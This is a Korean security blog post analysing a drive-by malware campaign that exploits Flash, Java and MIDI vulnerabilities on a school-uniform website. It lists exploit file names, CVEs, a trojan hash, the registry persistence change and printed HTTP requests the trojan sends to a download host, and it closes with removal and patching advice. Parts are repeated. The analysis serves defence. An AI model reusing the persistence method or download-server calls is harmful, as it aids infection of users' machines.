반응형
주말을 이용한 악성코드 유포 중에서 Adobe Flash Player, Oracle JRE, MIDI 취약점을 함께 악용하여 취약점 패치가 이루어지지 않은 사용자가 특정 웹 사이트 접속시 자동으로 감염되도록 한 사례를 확인하였습니다.
특히 해당 사이트는 최근 졸업과 새학기 준비를 맞이하여 교복에 관심이 있다는 점에서 국내 유명 교복 관련 웹 사이트를 우연의 일치처럼 잘 활용하고 있는 것으로 보입니다.
이를 통해 최종적으로 다운로드된 파일 java.gif(= pk.exe 또는 (5자리 영문).exe) (MD5 : 3b421a2d8db89ee0a3831d1b275cdbf5)에 대하여 안철수연구소(AhnLab) V3 보안 제품에서는 Win-Trojan/Onlinegamehack.62464.BJ (VirusTotal : 20/42) 진단명으로 진단되고 있습니다.
1. Adobe Flash Player 취약점
2. MIDI 취약점
▷ MIDI 취약점을 이용한 정보 탈취 악성코드 유포 주의 (2012.1.27)
3. Oracle JRE 취약점
이들 취약점을 이용한 파일 감염 흐름도를 살펴보면 ① "C:\Documents and Settings\(사용자 계정)\Local Settings\Temp\good.vbs" 파일을 생성한 후, ② 인터넷 임시 폴더에 다운로드된 최종 파일은 "C:\Documents and Settings\(사용자 계정)\Local Settings\Temp\good.exe" 위치로 이동됩니다.(※ good.exe(MD5 : 3b421a2d8db89ee0a3831d1b275cdbf5)은 최종 파일과 일치합니다.)
③ good.exe 파일은 "C:\WINDOWS\system32\(5자리 영문).exe" 파일로 자가 복제한 후 자신은 삭제 처리가 이루어집니다.
해당 파일은 레지스트리 값(Winlogon)에 자신을 추가하여 Windows 시작시마다 자동으로 실행되어 특정 서버에 접속하는 동작을 확인할 수 있습니다.
만약 정상적으로 동작이 이루어진다면 추가적인 악성 파일 다운로드를 통해 추가적인 감염이 발생할 것으로 보입니다.
해당 악성코드를 수동으로 처리할 필요가 있는 경우에는 다음과 같은 절차에 따라 문제를 해결하시기 바랍니다.
▷ 필요없는 프로세스 찾는 방법 (2009.3.21)
참고로 Process Explorer 프로그램에 대한 기본적인 사용 방법은 링크 내용을 참고하시기 바랍니다.
이를 통해 explorer.exe 프로세스에 핸들되어 있던 악성 파일은 윈도우 탐색기를 실행하여 사용자가 시스템 폴더에 위치한 파일을 쉽게 삭제하실 수 있습니다.
레지스트리 편집기에서 "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" 값을 찾아 우측 패널의 "Userinit" 항목을 더블 클릭하시기 바랍니다.
단, 중요한 점은 수정한 후의 데이터 값은 반드시 "C:\WINDOWS\system32\userinit.exe," 값이어야 합니다.(※ 쉼표(,)를 반드시 추가하시기 바랍니다.)
위와 같이 중국발 악성코드 유포는 시스템 파일 패치 방식 이외에도 위와 같은 방식으로도 감염을 유발하여 다수의 추가적인 악성 파일을 지속적으로 다운로드할 수 있으므로 주의하시기 바랍니다.
또한 해당 악성코드에 감염된 사용자는 Adobe Flash Player, Oracle JRE (단, 설치된 사용자의 경우), 윈도우 보안 업데이트를 반드시 확인하여 패치를 하시기 바랍니다.
특히 해당 사이트는 최근 졸업과 새학기 준비를 맞이하여 교복에 관심이 있다는 점에서 국내 유명 교복 관련 웹 사이트를 우연의 일치처럼 잘 활용하고 있는 것으로 보입니다.
| 파일명 | 보안 제품 | 진단명 |
| ad.html | AhnLab V3 | JS/Exploit |
| Applet.html | Hauri ViRobot | HTML.S.Agent.228 |
| Applet.jar | Microsoft | Exploit:Java/CVE-2011-3544.M |
| uc.html | AhnLab V3 | JS/Iframe |
| f1.html | avast! | JS:Agent-JB [Trj] |
| kkxx.swf | avast! | SWF:CVE-2011-2140-A [Expl] |
| e.avi | AhnLab V3 | Exploit/Cve-2011-2140 |
| ie.html | AhnLab V3 | JS/Exploit |
| sro.js | avast! | JS:ShellCode-GU [Expl] |
| ms.html | AhnLab V3 | JS/Exploit |
| exp.mid | Hauri ViRobot | MID.S.CVE-2012-0003.75.A |
이를 통해 최종적으로 다운로드된 파일 java.gif(= pk.exe 또는 (5자리 영문).exe) (MD5 : 3b421a2d8db89ee0a3831d1b275cdbf5)에 대하여 안철수연구소(AhnLab) V3 보안 제품에서는 Win-Trojan/Onlinegamehack.62464.BJ (VirusTotal : 20/42) 진단명으로 진단되고 있습니다.
1. Adobe Flash Player 취약점
2. MIDI 취약점
▷ MIDI 취약점을 이용한 정보 탈취 악성코드 유포 주의 (2012.1.27)
3. Oracle JRE 취약점
이들 취약점을 이용한 파일 감염 흐름도를 살펴보면 ① "C:\Documents and Settings\(사용자 계정)\Local Settings\Temp\good.vbs" 파일을 생성한 후, ② 인터넷 임시 폴더에 다운로드된 최종 파일은 "C:\Documents and Settings\(사용자 계정)\Local Settings\Temp\good.exe" 위치로 이동됩니다.(※ good.exe(MD5 : 3b421a2d8db89ee0a3831d1b275cdbf5)은 최종 파일과 일치합니다.)
③ good.exe 파일은 "C:\WINDOWS\system32\(5자리 영문).exe" 파일로 자가 복제한 후 자신은 삭제 처리가 이루어집니다.
[생성 파일 및 진단 정보]
C:\Documents and Settings\(사용자 계정)\Local Settings\Temp\good.vbs
C:\WINDOWS\system32\utehd.exe
- MD5 : 3b421a2d8db89ee0a3831d1b275cdbf5
- AhnLab V3 : Win-Trojan/Onlinegamehack.62464.BJ (VirusTotal : 20/42)
※ 해당 파일은 (5자리 영문).exe 형태입니다.
[변경 레지스트리 등록 정보]
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
- Userinit = C:\WINDOWS\system32\userinit.exe, :: 변경 전
- Userinit = C:\WINDOWS\system32\userinit.exe,utehd.exe :: 변경 후
C:\Documents and Settings\(사용자 계정)\Local Settings\Temp\good.vbs
C:\WINDOWS\system32\utehd.exe
- MD5 : 3b421a2d8db89ee0a3831d1b275cdbf5
- AhnLab V3 : Win-Trojan/Onlinegamehack.62464.BJ (VirusTotal : 20/42)
※ 해당 파일은 (5자리 영문).exe 형태입니다.
[변경 레지스트리 등록 정보]
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
- Userinit = C:\WINDOWS\system32\userinit.exe, :: 변경 전
- Userinit = C:\WINDOWS\system32\userinit.exe,utehd.exe :: 변경 후
해당 파일은 레지스트리 값(Winlogon)에 자신을 추가하여 Windows 시작시마다 자동으로 실행되어 특정 서버에 접속하는 동작을 확인할 수 있습니다.
GET /dwpzqq/dwpzqq.jpg HTTP/1.1하지만 테스트 과정에서는 "400 Bad Request"가 뜨면서 실제 다운로드는 이루어지지 않고 있는 것을 확인할 수 있었습니다.
Accept: */*
Accept-Language: zh-tw
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
Host: dwpzqq.web799os.com
Connection: Keep-Alive
GET /dwpzqq/dwpzqq.gif HTTP/1.1
Accept: */*
Accept-Language: zh-tw
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
Host: dwpzqq.web799os.com
Connection: Keep-Alive
만약 정상적으로 동작이 이루어진다면 추가적인 악성 파일 다운로드를 통해 추가적인 감염이 발생할 것으로 보입니다.
해당 악성코드를 수동으로 처리할 필요가 있는 경우에는 다음과 같은 절차에 따라 문제를 해결하시기 바랍니다.
▷ 필요없는 프로세스 찾는 방법 (2009.3.21)
참고로 Process Explorer 프로그램에 대한 기본적인 사용 방법은 링크 내용을 참고하시기 바랍니다.
이를 통해 explorer.exe 프로세스에 핸들되어 있던 악성 파일은 윈도우 탐색기를 실행하여 사용자가 시스템 폴더에 위치한 파일을 쉽게 삭제하실 수 있습니다.
레지스트리 편집기에서 "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" 값을 찾아 우측 패널의 "Userinit" 항목을 더블 클릭하시기 바랍니다.
단, 중요한 점은 수정한 후의 데이터 값은 반드시 "C:\WINDOWS\system32\userinit.exe," 값이어야 합니다.(※ 쉼표(,)를 반드시 추가하시기 바랍니다.)
위와 같이 중국발 악성코드 유포는 시스템 파일 패치 방식 이외에도 위와 같은 방식으로도 감염을 유발하여 다수의 추가적인 악성 파일을 지속적으로 다운로드할 수 있으므로 주의하시기 바랍니다.
또한 해당 악성코드에 감염된 사용자는 Adobe Flash Player, Oracle JRE (단, 설치된 사용자의 경우), 윈도우 보안 업데이트를 반드시 확인하여 패치를 하시기 바랍니다.
728x90
반응형